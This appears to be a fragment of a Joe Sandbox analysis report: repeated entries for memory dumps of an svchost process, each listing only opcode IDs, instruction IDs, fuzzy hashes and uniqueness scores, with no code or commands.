                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 66a0f787908021d6de98789ae4c40b55333830680f7552ee2cde3f6115671019
                                                                                                                                                                                      • Instruction ID: e615dd77ce4186f2bde0a49c288cd396090e3c6730d9a1fa15b80dbc401a7c8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 66a0f787908021d6de98789ae4c40b55333830680f7552ee2cde3f6115671019
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B91E971B0C9494FDBA8EE2CD4A567977E9EF99341B2440FED04EC72D2DE24AC428781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f07829892dca79aac2446ee3c339fa3433ffa01a4862851b823c9c1b18a1c20e
                                                                                                                                                                                      • Instruction ID: b9999c5acb55bbb8df6ad564bfd6b0592d8570985e85896a394a358229926671
                                                                                                                                                                                      • Opcode Fuzzy Hash: f07829892dca79aac2446ee3c339fa3433ffa01a4862851b823c9c1b18a1c20e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6181F3B190C9494FDB59EF28D4A59B87BF5FF59300F1401AAE84EC32D2DE24A846CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1e374188250a9fb2baf65c75c4ff9dd2f5018685fe0e63afd73ac7e278089257
                                                                                                                                                                                      • Instruction ID: 421b57cf908d182f70c474e769dc473e77db52d99efbf8c19af070cd075ae1f9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e374188250a9fb2baf65c75c4ff9dd2f5018685fe0e63afd73ac7e278089257
                                                                                                                                                                                      • Instruction Fuzzy Hash: D971E471A0C9498FDB49EF68C455AE9BBE1EF59310F1441AAE40DC72E6CE24AC46CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 925d14d41baf123ddcd7c829051d03a52a6d624f5964dc00016a8ca794fb4e3b
                                                                                                                                                                                      • Instruction ID: 58473314cf39071ed2568955e5c78e8d22fb38b5bc3ff2232e862eb5afb2132d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 925d14d41baf123ddcd7c829051d03a52a6d624f5964dc00016a8ca794fb4e3b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B71E371A0C9898FDB48EF6CC455AE9BBE1EF59310F1401AED44DC72A6CE24AC46CB41
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4e936156bfbb9bc16286406ab3aeffece1d9a60c699b6539315a975508b93944
                                                                                                                                                                                      • Instruction ID: 6be7b8559cc66c0c024b5ab182c18df6db61e09f0528bbb3cdb1140baf0c56d4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e936156bfbb9bc16286406ab3aeffece1d9a60c699b6539315a975508b93944
                                                                                                                                                                                      • Instruction Fuzzy Hash: 717101B191CA454BE729EE28C4E55B1B7E8EF59300B6505BDD48FC39E2DE29BC038781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 63cccf443e9166f05a5dced9d3bcc666750e07c46253687538ea42df091a1820
                                                                                                                                                                                      • Instruction ID: f1cc4f894981ebf4773d7ddaa69c877ee07e6f3b3d47b426b775a716255255ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 63cccf443e9166f05a5dced9d3bcc666750e07c46253687538ea42df091a1820
                                                                                                                                                                                      • Instruction Fuzzy Hash: DA81E6B091CB5E8FDB49EF28C5E05A977B6FF95300B2445F9D00AC72C6DA35A882C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5b83f72d756e66e5c5f09435c3a13861e60480c2934591a18d03e1e31e830722
                                                                                                                                                                                      • Instruction ID: d3b7bf05d536f1ef1ca875fe5a33781e0e310b62e218a1348b24b359c6154b98
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b83f72d756e66e5c5f09435c3a13861e60480c2934591a18d03e1e31e830722
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D7112B191CA454BE728EE29C5D55B1B3E8EF58300B6545BDD48FC39E2DE29BC038781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0bf7672a6947004fa7e2830462466b27e13016e0dbbfc457f07f2e0cfe981e1b
                                                                                                                                                                                      • Instruction ID: 747a5e8df81ac164f909ec1ebfe4528298af6972909d53ad231d0a96f0d847bd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0bf7672a6947004fa7e2830462466b27e13016e0dbbfc457f07f2e0cfe981e1b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8761457051CB4A4FE31AFF38D8944A1B7E4FF95314B6445FED09AC71E6DA29A842C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d68a63df0602d929ce1441a37e8c16709ef9def9b2b19c4d7f8972f9760fe2ef
                                                                                                                                                                                      • Instruction ID: cbb8175218a564081a5b30dc2239802308fa0cf9729746399fdad8c6039bc9fb
                                                                                                                                                                                      • Opcode Fuzzy Hash: d68a63df0602d929ce1441a37e8c16709ef9def9b2b19c4d7f8972f9760fe2ef
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1361B37591C91A8FEB88FF24C4A09E9B3F5FF54304B2406B9D419DB196DA35E4428B80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c632f12360822792bd74ec989108a351bd2be7b76825d57869e7a8c4df7dede0
                                                                                                                                                                                      • Instruction ID: 41bb70ab5b9477ff4620ada571d459249722701b2f47ad81a4420640525f1358
                                                                                                                                                                                      • Opcode Fuzzy Hash: c632f12360822792bd74ec989108a351bd2be7b76825d57869e7a8c4df7dede0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D515B7191CB864FD319DF38C8E5165BBE6EFD6201F1446BDD0CAC72E6DA24A406C782
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 9238aa4cbeb36033b72aef08b331b2185d6f44351fad37f77f5bafda48937ed6
                                                                                                                                                                                      • Instruction ID: f994957ec72c11b2625ee192610ef683e100a59bc2e8457ee04b741a943fa727
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9238aa4cbeb36033b72aef08b331b2185d6f44351fad37f77f5bafda48937ed6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1551387151D7894FD3599E38C8A14757BE5EF8A710B2403BEE48BC72D6DD25A803C391
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: af872b036fd2726be9a9be3cfe06e54d85790db98995ff6fe1c7cebe1454b6be
                                                                                                                                                                                      • Instruction ID: bd2b71affeeae3f20260034a4826487c9c5b442c6a0258c3f9835dc453ff9a27
                                                                                                                                                                                      • Opcode Fuzzy Hash: af872b036fd2726be9a9be3cfe06e54d85790db98995ff6fe1c7cebe1454b6be
                                                                                                                                                                                      • Instruction Fuzzy Hash: 42518C7590CA5D8FDB85EF28C464AE87BE1FF69301F1901EAD449D72E2CA35AC408B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 943922e4c79e6f3151474fec6dc19798620159c6ff35081d2dfb18e570315ddd
                                                                                                                                                                                      • Instruction ID: 0a256932ccb63bc57b375bb3a8b3d19b6b1b5c45a0b84aa264e45917e9ae38c8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 943922e4c79e6f3151474fec6dc19798620159c6ff35081d2dfb18e570315ddd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 56519375A09A5D8FDB88EF28C459AE97BF1FF59301F1401AED04AE72E1CA75AC40CB50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: a3eb7e6c78484d08d5743c7641a85219086bd1183002309afac03fc9b9f7da8b
                                                                                                                                                                                      • Instruction ID: da5f9a32b2fcd0270e77f4dff825431e5e564dd4b2576b56d01ffcd04ca06a63
                                                                                                                                                                                      • Opcode Fuzzy Hash: a3eb7e6c78484d08d5743c7641a85219086bd1183002309afac03fc9b9f7da8b
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD5193B1D18A498FEB89EF68D8996E8BBF1FF58340F1401B9D40DD7292DE3468818B11
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1c2784e719aed3b9ec01932596dacb6b644b62c7facffef2300c2a9294d60a62
                                                                                                                                                                                      • Instruction ID: c11967ba0c6eb21fd7eae3cede3af50632fb85499b5e3e11a20d3c3c57ad0e64
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c2784e719aed3b9ec01932596dacb6b644b62c7facffef2300c2a9294d60a62
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3341E17061CB864BD758DF28C4A1569B7E6FBE5311F2485BEE0CAC33E5DA34E4418B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: bbcb73e7f0cc9a5bd7291e54bcd36456d052fa33a02373a4f4d7cce82acebcb6
                                                                                                                                                                                      • Instruction ID: d1d554cc03ce13912f7e65a5b8b4a0ecdbf3591eaa179892be7cfe11d7cbebc2
                                                                                                                                                                                      • Opcode Fuzzy Hash: bbcb73e7f0cc9a5bd7291e54bcd36456d052fa33a02373a4f4d7cce82acebcb6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4141C27061CB864BD318DF28C491469BBE6FFD9201F2485BDE4CAC33A5DA34E442CB82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 503c2b1a046951e23c015f556f04bb4d1a69c22d9ec3c4e9ba7482080ed05feb
                                                                                                                                                                                      • Instruction ID: 3db60140ff13acd400b0fad91d77470ce81a80427701a6f7e18655699a96d6ed
                                                                                                                                                                                      • Opcode Fuzzy Hash: 503c2b1a046951e23c015f556f04bb4d1a69c22d9ec3c4e9ba7482080ed05feb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5531267061CB954BD318DF28C491465BBF6FBD5201F2489BDE0D6C32A5DA34E441CB82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: bf163436e7dddf203714b444d243bf689e251ccd0bf1392dea0969291ddaef29
                                                                                                                                                                                      • Instruction ID: f98a73a29063b1a8cdac7349163280a86873242971cc4b8c6fe998620b60b994
                                                                                                                                                                                      • Opcode Fuzzy Hash: bf163436e7dddf203714b444d243bf689e251ccd0bf1392dea0969291ddaef29
                                                                                                                                                                                      • Instruction Fuzzy Hash: B531F07161CB854BD358DF28C492425BBE2FBE5312F2486BAE4CAC33E5DA34E5418B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2936903b938bcbf53bfe223cb8dfd9ae4b5eab17e42b99a8528c9f6c8b7afa63
                                                                                                                                                                                      • Instruction ID: 630c6ca3d998c54d107860e670f0b2e8cf27ef8c66d8914f23cc8f2bbaaebd57
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2936903b938bcbf53bfe223cb8dfd9ae4b5eab17e42b99a8528c9f6c8b7afa63
                                                                                                                                                                                      • Instruction Fuzzy Hash: 002149A1B1EA4A4FE788EF7CD8A977566D9EF98240F5400FAE44DC32D2CC286C458352
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ee1bb3a6f81f9c674d2ac9e85d3fb799f4869dc57a59cc074232176189c14afb
                                                                                                                                                                                      • Instruction ID: c87cb70efb8fcdfd2804af8c0873c94768f267a9e45210bae6b8ae70b3388212
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee1bb3a6f81f9c674d2ac9e85d3fb799f4869dc57a59cc074232176189c14afb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 202148A1B1EA094FE788EF7DD8A977576D6EF98240F1400FAE40DC32D2CC286C458351
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ab54b95d6074ebaa327be77361cbe99509852cd9cc70204dae94c25217fe43a1
                                                                                                                                                                                      • Instruction ID: 1b447ad61b0ddffd5efd55275c8200fc851314bb911a0c7817483aec6bc7c543
                                                                                                                                                                                      • Opcode Fuzzy Hash: ab54b95d6074ebaa327be77361cbe99509852cd9cc70204dae94c25217fe43a1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5421D87051CF1A4FE359EF38C4D4561B3E1FBA831975086BED49AC72A5EA34E481CB40
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 65a67f62b7164904ad20ceb0ff5f5ec1cf698339c684962a1d1469f2114967a0
                                                                                                                                                                                      • Instruction ID: 71225c2f1a053b81fef086bc90820537653ea5857a622c817ee98787efee9586
                                                                                                                                                                                      • Opcode Fuzzy Hash: 65a67f62b7164904ad20ceb0ff5f5ec1cf698339c684962a1d1469f2114967a0
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB21D3B161CA494FE358EF38C8E5071B7E1FB9930972445FED49AC32E6DA25E842C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0b05863af408a089128a72044db7abd8f714cbf918c37b193b30f9d0cdc94d06
                                                                                                                                                                                      • Instruction ID: ad2e5195acca102ce22d6f519123813e736f5817f5677785dbbf04eb6e82db07
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b05863af408a089128a72044db7abd8f714cbf918c37b193b30f9d0cdc94d06
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6021D37290CA494FE341FF34C4552F5B7D5EF59310F6806BAD88CD71E2DE28A9428741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d6e50d5281a2887f337e0f11e4a12efe35ec29fd96920a97806cdc0fa4f4ef6d
                                                                                                                                                                                      • Instruction ID: 34805d455bf8b1e6bd888e4d0671349e1ca3f21201f8ad5899dd9974abdcbb4c
                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e50d5281a2887f337e0f11e4a12efe35ec29fd96920a97806cdc0fa4f4ef6d
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD114CE290E65247D2417E38EDF34F53BA8EF42295BA801F7E448C91D3ED2D244682A2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f837070c4328888a4d92252396b0ac87297dc514845ea14eeac6d9f9a3ee89fd
                                                                                                                                                                                      • Instruction ID: 8c6b829e93aeb61fcae10a2a73f83043aa4ee2a7a9ba560c6159729bd401a4ee
                                                                                                                                                                                      • Opcode Fuzzy Hash: f837070c4328888a4d92252396b0ac87297dc514845ea14eeac6d9f9a3ee89fd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 10119E7060DA054B9B69EE38D1A49BA73F9EF98315B64067EE44AC32A1CE38A8418741
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2f93cf4ff67f994aa8703daf893b5f0d2c4a4a99b76c0646f361d24c79fb042a
                                                                                                                                                                                      • Instruction ID: 4403e7c11b71bb13b258e63cc21a7c6dbf9b0ac10d95cb2cf71c8b339e737bba
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f93cf4ff67f994aa8703daf893b5f0d2c4a4a99b76c0646f361d24c79fb042a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 550128A6F2C9424BD31CEE7CC9670F8B699DB55720B2983BDD84BC73D2EC08980201C6
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
